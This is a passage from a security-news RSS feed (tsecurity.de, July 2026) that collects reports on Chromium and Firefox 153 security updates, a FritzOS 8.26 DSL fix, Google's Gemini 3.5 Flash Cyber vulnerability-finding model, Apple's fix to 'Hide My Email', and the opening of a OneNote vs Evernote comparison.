<p>Die Hersteller anderer auf Chromium basierender Browser sind nun wieder gefordert, mit Updates nachzuziehen. Microsoft Edge, Brave und Vivaldi sind auf dem Sicherheitsstand der Vorwoche. Opera ist mit seiner Browser-Version 133 weiterhin auf einem Holzweg unterwegs. Darin ist die veraltete Chromium-Ausgabe 149.0.7827.201 vom 25. Juni verbaut und für Chromium 149 liefert Google seitdem keine Updates mehr.</p>



<p><strong>Chromium-basierte Browser in der Übersicht:</strong></p>



<figure class="wp-block-table is-style-stripes"><table class="has-fixed-layout"><thead><tr><th><strong>Browser</strong></th><th>Version</th><th>Chromium-Version</th><th>abgesichert?</th></tr></thead><tbody><tr><td><a href="https://www.pcwelt.de/article/1135017/google-chrome.html" target="_blank" rel="noreferrer noopener" title="Download">Google Chrome ↓</a></td><td>150.0.7871.182</td><td>150.0.7871.182</td><td>🟢</td></tr><tr><td><a href="https://www.pcwelt.de/article/1191500/brave-browser.html" target="_blank" rel="noreferrer noopener" title="Download">Brave ↓</a></td><td>1.92.141</td><td>150.0.7871.128</td><td>🟡</td></tr><tr><td>Microsoft Edge</td><td>150.0.4078.83</td><td>150.0.7871.129</td><td>🟡</td></tr><tr><td><a href="https://www.pcwelt.de/article/1082991/browser-opera.html" target="_blank" rel="noreferrer noopener" title="Download">Opera One ↓</a></td><td>133.0.5932.60</td><td>149.0.7827.201</td><td>🟠</td></tr><tr><td><a href="https://www.pcwelt.de/article/1151272/vivaldi.html" target="_blank" rel="noreferrer noopener" title="Download">Vivaldi ↓</a></td><td>8.1.4087.55 </td><td>150.0.7871.178</td><td>🟡</td></tr></tbody></table><figcaption class="wp-element-caption"><em>Chromium-basierte Browser – Stand: 21.07.2026</em></figcaption></figure>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox 153.0 behebt über 60 Schwachstellen und erstellt QR-Codes]]></title>
<description><![CDATA[Die neue Firefox-Version 153 für Windows, macOS, Linux und Android bringt einige Verbesserungen bei der Benutzung wie etwa HDR-Videowiedergabe, abgeschottete Tab-Umgebungen, und QR-Code-Erzeugung zur Link-Weitergabe. Die Entwickler haben mehr als 60 Sicherheitslücken gestopft. Updates gibt es auc...]]></description>
<link>https://tsecurity.de/de/3685544/it-nachrichten/firefox-1530-behebt-ueber-60-schwachstellen-und-erstellt-qr-codes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685544/it-nachrichten/firefox-1530-behebt-ueber-60-schwachstellen-und-erstellt-qr-codes/</guid>
<pubDate>Wed, 22 Jul 2026 09:51:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Die neue Firefox-Version 153 für Windows, macOS, Linux und Android bringt einige Verbesserungen bei der Benutzung wie etwa HDR-Videowiedergabe, abgeschottete Tab-Umgebungen, und QR-Code-Erzeugung zur Link-Weitergabe. Die Entwickler haben mehr als 60 Sicherheitslücken gestopft. Updates gibt es auch für die ESR-Versionen.</p>



<p>Im <a href="https://www.mozilla.org/en-US/security/advisories/mfsa2026-68/" target="_blank" rel="noreferrer noopener">Sicherheitsbericht für Firefox 153</a> nennt Mozilla mehr als 63 beseitigte Sicherheitslücken, von denen 60 durch externe Sicherheitsforscher entdeckt und gemeldet wurden, drei davon durch OpenAI Codex Security. Mozilla stuft 17 dieser Schwachstellen als hohes Risiko ein. Bei vier dieser Lücken drohen Ausbrüche aus der Browser-Sandbox.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>Weitere 35 Schwachstellen sind als mittleres Risiko ausgewiesen, der Rest als geringes Risiko. Die drei letzten Einträge im Sicherheitsbericht fassen eine nicht angegebene Zahl intern gefundener, als hohes Risiko eingestufter Sicherheitslücken zusammen, die aus Programmierfehlern bei der Speicherverwaltung resultieren. Die Lücken sind danach gruppiert, welche Programme und Programmversionen betroffen sind.</p>



<h2 class="wp-block-heading toc">Was ist neu in Firefox 153?</h2>



<p>Für Windows-Nutzer bietet Firefox 153 die Wiedergabe von HDR-Videos (High Dynamic Range). Voraussetzung ist, dass der HDR-Modus in den Windows Bildschirmeinstellungen aktiviert ist. Notebook-Displays, die lediglich „HDR Video-Streaming“ bieten, werden derzeit nicht unterstützt, ebenso wie Smartphone-Videos im Hochkant-Format.</p>



<p>Mit dem integrierten PDF-Betrachter und -Editor können Sie nun mehrere PDF-Dateien zusammenführen, indem Sie sie in die PDF-Sidebar ziehen. Auch können Sie jetzt Bilder als neue Seiten in PDF-Dokumente einfügen.</p>



<p>Wenn Sie einen Link weitergeben wollen, etwa auch an Ihr eigenes Smartphone, ohne einen Web-Dienst (wie Firefox Sync) zu benutzen, können Sie mit Firefox 153 einen QR-Code erstellen. Firefox hebt nun das Symbol für die Standort-Freigabe in roter Farbe hervor, wenn eine Website Zugriff auf Ihren Standort hat.</p>


<div class="extendedBlock-wrapper block-coreImage center"><figure data-wp-context='{"imageId":"6a6076312fb5f"}' data-wp-interactive="core/image" class="wp-block-image aligncenter size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/ffx153-qrcode.webp" alt="Firefox 153 erstellt QR-Codes" class="wp-image-3196298" width="1024" height="576" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><em>Link mittels QR-Code teilen</em></figcaption></figure><p class="imageCredit">fz</p></div>



<p>Das mit Firefox 149 eingeführte und in Firefox integrierte Gratis-VPN bietet weiterhin eine vorübergehend (bis Ende August) auf 28 Länder erweiterte Auswahl virtueller Standorte mit uneingeschränktem Datenvolumen. Das kostenlose VPN ist derzeit für Firefox-Nutzer in den USA, Kanada, Großbritannien, Frankreich und Deutschland verfügbar.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihren Browser stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h2 class="wp-block-heading toc">Weitere Browser-Updates</h2>



<p>Neben <a title="Download" href="https://www.pcwelt.de/article/1082606/firefox-50.html" data-type="link" data-id="https://www.pcwelt.de/article/1082606/firefox-50.html" target="_blank" rel="noreferrer noopener">Firefox 153.0</a> sind auch die ESR-Ausgaben 140.13.0 und 115.38.0 erhältlich. Letztere gibt es allerdings nur für Windows 7 &amp; 8.1 sowie macOS 10.12 bis 10.14. In den ESR-Versionen haben Mozillas Entwickler diejenigen der oben genannten Schwachstellen behoben, die schon im teils gut abgehangenen Code dieser Browser-Generationen stecken. Das sind in Firefox 140.13 mindestens 32 und in Firefox 115.38 immerhin noch wenigstens 14 geschlossene Sicherheitslücken. Darunter sind zwei als kritisch eingestufte Schwachstellen, die <a href="https://www.pcwelt.de/article/3167428/firefox-152-fuer-windows-mac-linux-mehr-sicherheit-neuer-look.html" target="_blank" rel="noreferrer noopener">bereits in Firefox 152.0.6 beseitigt</a> wurden. Firefox 153 ist außerdem die Basis für die nächste ESR-Generation. Das bedeutet, Firefox ESR 140 wird im Oktober durch Firefox ESR 153 abgelöst.</p>



<h2 class="wp-block-heading toc">Gnadenfrist für Windows 7 &amp; 8 erneut verlängert</h2>



<p>Firefox ESR 115 wird vorerst bis März 2027 (v115.52) weiter <a href="https://support.mozilla.org/de/kb/firefox-nutzer-win-7-8-81-umstellung-firefox-esre" target="_blank" rel="noreferrer noopener">mit Sicherheits-Updates gepflegt</a>. Wenn Sie Firefox 115 unter Windows 7, 8.1 oder macOS 10.12 bis 10.14 einsetzen, erhalten Sie zumindest für den Browser weiterhin aktuelle Sicherheits-Updates. Rechtzeitig vor Ablauf dieser Gnadenfrist wird Mozilla die Situation neu bewerten und dann entscheiden, ob es eine weitere Verlängerung gibt.</p>



<h2 class="wp-block-heading toc">Updates für Tor Browser und Thunderbird</h2>



<p>Der neueste <a href="https://www.pcwelt.de/article/1105413/anonymisierungs-programm-tor.html" target="_blank" rel="noreferrer noopener" title="Download">Tor Browser</a> 15.0.19 basiert auf Firefox ESR 140.13. Das ansonsten von Mozilla unabhängige Tor-Projekt und die Nutzer des Tor Browsers profitieren so von den in Firefox gestopften Sicherheitslücken. Tor Browser 15.0.9 bringt die Erweiterung NoScript 13.6.31 mit. Das Tor Projekt hostet NoScript für seinen Browser inzwischen selbst. Erkennbar ist das daran, dass diese NoScript-Version den Suffix „.1984“ (aktuell also 13.6.31.1984) trägt – George Orwell lässt grüßen. Ansonsten ist sie identisch mit der Version auf AMO (addons.mozilla.org). Einen Tor Browser für ältere Systeme gibt es nicht mehr. Auch Mozillas Mailer <a href="https://www.pcwelt.de/article/1164952/email-client-thunderbird.html" data-type="link" data-id="https://www.pcwelt.de/article/1164952/email-client-thunderbird.html" target="_blank" rel="noreferrer noopener" title="Download">Thunderbird</a> 153.0 und 140.13.0esr sind verfügbar. Darin haben die Entwickler ebenfalls Dutzende Sicherheitslücken beseitigt, die das Mail-Programm vorwiegend von Firefox geerbt hat. </p>



<p>Bis zur Veröffentlichung der nächsten Hauptversion Firefox 154 am 18. August plant Mozilla wöchentliche Updates zur Fehlerbehebung und um weitere Schwachstellen zu beseitigen. Nach Firefox 154 wechselt Mozilla, wie auch Google Chrome und Microsoft Edge, auf einen <a href="https://www.pcwelt.de/article/3190234/bald-sollen-die-webbrowser-doppelt-so-oft-aktualisiert-werden.html" target="_blank" rel="noreferrer noopener">zweiwöchentlichen Turnus</a> für neue Hauptversionen. Firefox 155 soll demnach bereits am 1. September erscheinen.</p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fritzbox-Nutzer sollten jetzt nach Updates suchen: FritzOS 8.26 behebt DSL-Problem]]></title>
<description><![CDATA[Besitzer einer Fritzbox 7510 steht ab sofort FritzOS 8.26 bereit. Das neue Wartungsupdate behebt einen Fehler, der unter bestimmten Bedingungen die Geschwindigkeit von DSL-Anschlüssen erheblich reduzieren konnte. Darauf weisen die offiziellen Versionshinweise von Fritz sowie mehrere Medienbericht...]]></description>
<link>https://tsecurity.de/de/3685541/it-nachrichten/fritzbox-nutzer-sollten-jetzt-nach-updates-suchen-fritzos-826-behebt-dsl-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685541/it-nachrichten/fritzbox-nutzer-sollten-jetzt-nach-updates-suchen-fritzos-826-behebt-dsl-problem/</guid>
<pubDate>Wed, 22 Jul 2026 09:50:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Besitzer einer <a href="https://www.pcwelt.de/article/1204711/test-avm-fritzbox-7510-wlan-router.html" target="_blank" rel="noreferrer noopener">Fritzbox 7510</a> steht ab sofort FritzOS 8.26 bereit. Das neue Wartungsupdate behebt einen Fehler, der unter bestimmten Bedingungen die Geschwindigkeit von DSL-Anschlüssen erheblich reduzieren konnte. Darauf weisen die offiziellen Versionshinweise von Fritz sowie mehrere Medienberichte, etwa von <a href="https://winfuture.de/news,160120.html" target="_blank" rel="noreferrer noopener">Winfuture</a>, hin.</p>



<p>Wer eine Fritzbox 7510 nutzt, sollte daher prüfen, ob die neue Firmware bereits zur Installation angeboten wird. Das Update enthält zwar keine neuen Funktionen, beseitigt aber ein Problem, das die Internetverbindung im Alltag spürbar beeinträchtigen konnte.</p>



<h2 class="wp-block-heading">Fehler begrenzte DSL-Anschlüsse auf 10 MBit/s</h2>



<p>In bestimmten technischen Konstellationen kam es vor, dass DSL-Verbindungen unabhängig vom gebuchten Tarif auf maximal <a href="https://fritz.com/apps/knowledge-base/fritz-box-7510/198_DSL-Datenrate-zu-gering?utm_source=chatgpt.com" target="_blank" rel="noreferrer noopener">10 MBit/s begrenzt wurden</a>. Nutzer bemerkten dies möglicherweise durch ungewöhnlich langsame Downloads, längere Ladezeiten oder Probleme beim Streaming und Online-Gaming.</p>



<p>Mit FritzOS 8.26 soll dieser Fehler nun behoben sein. Die offiziellen Änderungen fallen überschaubar aus:</p>



<ul class="wp-block-list">
<li>Behebung eines Fehlers, der DSL-Verbindungen unter bestimmten Bedingungen auf 10 MBit/s begrenzen konnte</li>



<li>Verbesserungen der Systemstabilität</li>
</ul>



<h2 class="wp-block-heading">Bislang nur für die Fritzbox 7510</h2>



<p>Aktuell wird FritzOS 8.26 für die Fritzbox 7510 bereitgestellt. Dabei handelt es sich um ein DSL-Einstiegsmodell mit Unterstützung für Supervectoring-Anschlüsse mit bis zu 300 MBit/s.</p>



<p>Erfahrungsgemäß veröffentlicht Fritz neue Wartungsupdates jedoch häufig zunächst für einzelne Modelle, bevor weitere Router folgen. Ob und wann andere Fritzboxen ebenfalls FritzOS 8.26 erhalten, ist derzeit noch nicht bekannt.</p>



<p>Unabhängig davon empfiehlt es sich grundsätzlich, regelmäßig nach neuen Firmware-Versionen zu suchen. Updates schließen nicht nur Fehler, sondern verbessern häufig auch die Stabilität und Sicherheit des Heimnetzes.</p>



<h2 class="wp-block-heading">So prüfen Sie, ob das Update verfügbar ist</h2>



<p>Die Aktualisierung lässt sich direkt über die <a href="https://www.pcwelt.de/article/1196302/die-neuesten-updates-fuer-fritzbox-co.html" target="_blank" rel="noreferrer noopener">Benutzeroberfläche der Fritzbox installieren</a>. Öffnen Sie dazu in Ihrem Browser die Adresse „fritz.box“ und wechseln Sie anschließend zu System &gt; Update. Dort können Sie manuell nach einer neuen Firmware suchen.</p>



<p>Wer automatische Updates aktiviert hat, muss in der Regel nichts unternehmen. In diesem Fall lädt und installiert die Fritzbox neue Versionen selbstständig, häufig außerhalb der üblichen Nutzungszeiten.</p>



<p>Für Besitzer einer Fritzbox 7510 dürfte die Installation von FritzOS 8.26 insbesondere dann interessant sein, wenn die Internetgeschwindigkeit zuletzt unerwartet niedrig ausgefallen ist.</p>



<p><strong>Weitere Beiträge zum Thema:<br></strong></p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/1157690/fritzbox-router-im-vergleich-das-beste-modell.html" target="_blank" rel="noreferrer noopener">Fritzbox-Router im Vergleich: Welches ist das beste Modell?</a></li>



<li><a href="https://www.pcwelt.de/article/2873266/fritzbox-absichern-so-sind-sie-optimal-geschuetzt.html" target="_blank" rel="noreferrer noopener">Fritzbox absichern: So sind Sie optimal geschützt</a></li>



<li><a href="https://www.pcwelt.de/article/1196434/test-fritzbox-7590-ax-neuer-high-end-router-mit-wi-fi-6.html" target="_blank" rel="noreferrer noopener">Test: Fritzbox 7590 AX – neuer High-End-Router mit Wi-Fi 6</a></li>
</ul>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Unveils Gemini 3.5 Flash Cyber to Find and Fix Software Vulnerabilities Faster]]></title>
<description><![CDATA[Google has introduced Gemini 3.5 Flash Cyber, a lightweight AI model designed to improve cybersecurity by helping defenders identify, validate, and patch software vulnerabilities more efficiently. Built on Gemini 3.5 Flash and optimized for security tasks, Flash Cyber aims to deliver a cost-effec...]]></description>
<link>https://tsecurity.de/de/3685467/it-security-nachrichten/google-unveils-gemini-35-flash-cyber-to-find-and-fix-software-vulnerabilities-faster/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685467/it-security-nachrichten/google-unveils-gemini-35-flash-cyber-to-find-and-fix-software-vulnerabilities-faster/</guid>
<pubDate>Wed, 22 Jul 2026 08:55:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1133" height="692" src="https://thecyberexpress.com/wp-content/uploads/Flash-Cyber.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Flash Cyber" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Flash-Cyber.webp 1133w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber-300x183.webp 300w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber-1024x625.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber-768x469.webp 768w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber-600x366.webp 600w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber-150x92.webp 150w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber-750x458.webp 750w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber.webp 1133w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber-300x183.webp 300w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber-1024x625.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber-768x469.webp 768w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber-600x366.webp 600w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber-150x92.webp 150w, https://thecyberexpress.com/wp-content/uploads/Flash-Cyber-750x458.webp 750w" sizes="(max-width: 1133px) 100vw, 1133px" title="Google Unveils Gemini 3.5 Flash Cyber to Find and Fix Software Vulnerabilities Faster 4"></p><span data-contrast="auto">Google has introduced Gemini 3.5 Flash Cyber, a lightweight AI model designed to improve cybersecurity by helping defenders identify, validate, and patch software vulnerabilities more efficiently. Built on Gemini 3.5 Flash and optimized for security tasks, Flash Cyber aims to deliver a cost-effective alternative to larger AI models while supporting large-scale vulnerability analysis.</span>

<span data-contrast="auto">The company said it has invested in cybersecurity research for years, including automated vulnerability discovery through CodeMender, its code security agent that can detect and fix critical software flaws. However, as AI systems become increasingly capable of discovering <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="29060">vulnerabilities</a> faster than defenders can resolve them, Google believes a scalable and affordable approach is needed.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Gemini 3.5 Flash Cyber Focuses on Scalable Cybersecurity</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">According to <a href="https://deepmind.google/blog/introducing-gemini-3-5-flash-cyber/" target="_blank" rel="nofollow noopener">Google</a>, Gemini 3.5 Flash Cyber has been fine-tuned specifically to locate, verify, and remediate vulnerabilities more effectively than Gemini's standard Flash models. Because of the technology's dual-use nature, the company is initially limiting access through a pilot program for governments and trusted partners via CodeMender, with broader availability planned over time.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Google also confirmed that CodeMender's core capabilities will be made available through generally available Gemini models on the Gemini Enterprise Agent Platform.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Flash Cyber Improves Large-scale Code Analysis</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">A major challenge in <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-cybersecurity/" target="_blank" rel="noopener" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="29059">cybersecurity</a> is exploring vast execution search spaces across complex codebases. Instead of relying on a single call to a <a href="https://thecyberexpress.com/us-gets-pre-release-access-to-ai-models/" target="_blank" rel="noopener">large language model</a>, CodeMender invokes Flash Cyber multiple times, allowing sub-agents to inspect significantly more code paths before generating one consolidated report.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Google said the model's speed and lower operating cost make it suitable for continuous code scanning, software launch processes, and commit-scanning pipelines at scale.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Benchmark Results Show Competitive Performance</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Google evaluated Gemini 3.5 Flash <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="Cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="29061">Cyber</a> using the CyberGym benchmark, which measures AI agents against hundreds of real-world software vulnerabilities. Configured to call the model up to five times before producing a final report, CodeMender achieved competitive performance against significantly larger cybersecurity models. Google noted that competitor results were based on provider self-reported scores.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The model also outperformed Gemini 3.5 Flash and 3.6 Flash during Google's internal Big Sleep evaluation, which tested <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="29058">vulnerability</a> discovery in complex projects such as Chrome and Safari without safety guardrails.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">In Chrome's production commit-scanning pipeline, where vulnerabilities remained undisclosed to prevent benchmark contamination, Flash Cyber again delivered a significant improvement over Gemini 3.5 Flash. Google added that competitor models released after Opus 4.6 were excluded because their safety guardrails prevented them from completing the tasks.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Testing on the V8 JavaScript Engine found 55 unique confirmed vulnerabilities with <a href="https://thecyberexpress.com/gemini-ad-safety-targets-scam-ads/" target="_blank" rel="noopener">Gemini</a> 3.5 Flash Cyber, compared with 47 for Gemini 3.5 Flash and 36 for Opus 4.6, including 10 issues missed by both competing models.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Real-world Cybersecurity Deployment</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Google said Flash Cyber is already helping secure internal projects, including Chrome, Android, Cloud, Ads and YouTube. In one example, Google's Cloud Vulnerability Research team used the model to identify remote code execution vulnerabilities in public APIs and a memory-corruption flaw within a sensitive production service in just two hours. The model also generated a 100% reliable <a href="https://thecyberexpress.com/cve-2026-45829-chromatoast-chromadb/" target="_blank" rel="noopener">remote code execution</a> exploit capable of bypassing Address Space Layout Randomization (ASLR) and Write XOR Execute (W^X).</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Google added that early feedback from Wiz and Cloud CISO <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29062">Security</a> Engineering testers indicated a significant capability improvement over Gemini 3.5 Flash. The company also highlighted resources such as OSV.dev, which tracks more than 700,000 open-source vulnerabilities, and over a decade of OSS-Fuzz <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="29063">data</a> as key training assets supporting its cybersecurity models.</span><span data-ccp-props="{}"> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple behebt Schwachstelle bei „E-Mail-Adresse verbergen“]]></title>
<description><![CDATA[Apple hat die zu Monatsbeginn bekannt gewordene Schwachstelle in der Funktion „E-Mail-Adresse verbergen“ offenbar endlich behoben. Über ein Jahr lang ließ sich die tatsächliche E-Mail-Adresse von Nutzern des Dienstes vergleichsweise einfach herausfinden, während Apple damit geworben hatte, dass d...]]></description>
<link>https://tsecurity.de/de/3685338/ios-mac-os/apple-behebt-schwachstelle-bei-e-mail-adresse-verbergen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685338/ios-mac-os/apple-behebt-schwachstelle-bei-e-mail-adresse-verbergen/</guid>
<pubDate>Wed, 22 Jul 2026 07:44:10 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://www.ifun.de/apple-behebt-schwachstelle-bei-e-mail-adresse-verbergen-284207/"><img align="right" hspace="5" width="150" height="150" src="https://images.ifun.de/wp-content/uploads/2026/07/e-mail-adresse-verbergen-feature-150x150.jpg" class="alignright tfe wp-post-image" alt="E Mail Adresse Verbergen Feature" decoding="async"></a><p>Apple hat die zu Monatsbeginn bekannt gewordene Schwachstelle in der Funktion „E-Mail-Adresse verbergen“ offenbar endlich behoben. Über ein Jahr lang ließ sich die tatsächliche E-Mail-Adresse von Nutzern des Dienstes vergleichsweise einfach herausfinden, während Apple damit geworben hatte, dass diese nicht preisgegeben werde. „E-Mail-Adresse verbergen“ ist eine von Apple im Rahmen des kostenpflichtigen iCloud+-Pakets angebotene Funktion. […]</p>
<p>The post <a href="https://www.ifun.de/apple-behebt-schwachstelle-bei-e-mail-adresse-verbergen-284207/">Apple behebt Schwachstelle bei „E-Mail-Adresse verbergen“</a> first appeared on <a href="https://www.ifun.de/">ifun.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OneNote vs. Evernote: Notiz-Apps im Vergleich]]></title>
<description><![CDATA[Evernote und OneNote tragen den Kampf um die Notiz-App-Krone unter sich aus. 
					Foto: Bonya_06_Inna_Kharlamova_Makini_Caravello – shutterstock.com




Geht es um die richtige Notiz-App, fällt die Entscheidung im Regelfall zwischen OneNote von Microsoft und Evernote, das inzwischen dem italieni...]]></description>
<link>https://tsecurity.de/de/3685167/it-security-nachrichten/onenote-vs-evernote-notiz-apps-im-vergleich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685167/it-security-nachrichten/onenote-vs-evernote-notiz-apps-im-vergleich/</guid>
<pubDate>Wed, 22 Jul 2026 05:06:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Evernote und OneNote tragen den Kampf um die Notiz-App-Krone unter sich aus. " title="Evernote und OneNote tragen den Kampf um die Notiz-App-Krone unter sich aus. " src="https://images.computerwoche.de/bdb/3380610/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Evernote und OneNote tragen den Kampf um die Notiz-App-Krone unter sich aus. </p></figcaption></figure><p class="imageCredit">
					Foto: Bonya_06_Inna_Kharlamova_Makini_Caravello – shutterstock.com</p></div>




<p class="wp-block-paragraph">Geht es um die richtige Notiz-App, fällt die Entscheidung im Regelfall zwischen OneNote von Microsoft und Evernote, das inzwischen dem italienischen Softwareunternehmen <a href="https://www.computerwoche.de/article/2818214/zweiter-fruehling-fuer-die-notizen-app.html" title="Bending Spoons gehört" target="_blank">Bending Spoons gehört</a>. </p>



<ul class="wp-block-list">
<li><p><strong>OneNote</strong> ist seit dem Jahr 2003 auf dem Markt und wurde 2007 in Microsofts Office-Suite aufgenommen (die meisten Versionen laufen inzwischen unter dem Namen Microsoft 365). Zudem wird OneNote auch mit Windows 10 und 11 gebündelt und als eigenständiges Produkt kostenlos angeboten. Das eröffnet eine potenzielle Nutzerbasis von rund einer Milliarde Systemen.</p></li>



<li><p><strong>Evernote</strong> feierte im Jahr 2008 sein Marktdebüt und erfreut sich seither stetig wachsender Nutzerzahlen. Unternehmensangaben zufolge sind es inzwischen weltweit rund 225 Millionen User.</p></li>
</ul>



<p class="wp-block-paragraph">Sowohl OneNote als auch Evernote sind für alle wichtigen Desktop- und Mobile-Betriebssysteme verfügbar. Beide sind in der Lage, Notizen mit allen Geräten und dem Internet zu synchronisieren und beide versprechen, die einzige notwendige App für Notizen zu sein. Stellt sich die Frage: Was ist die bessere Wahl für <a href="https://www.computerwoche.de/article/2795948/die-besten-productivity-apps.html" title="Business-Nutzer" target="_blank">Business-Nutzer</a>?</p>



<p class="wp-block-paragraph">Wir haben uns die jeweils aktuellen Versionen beider Notiz-Apps für <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>, macOS, iPadOS, iOS und <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> angesehen und sagen Ihnen, worin sich OneNote und Evernote im Wesentlichen unterscheiden. </p>



<h2 class="wp-block-heading">One Note: Organisationskrösus</h2>



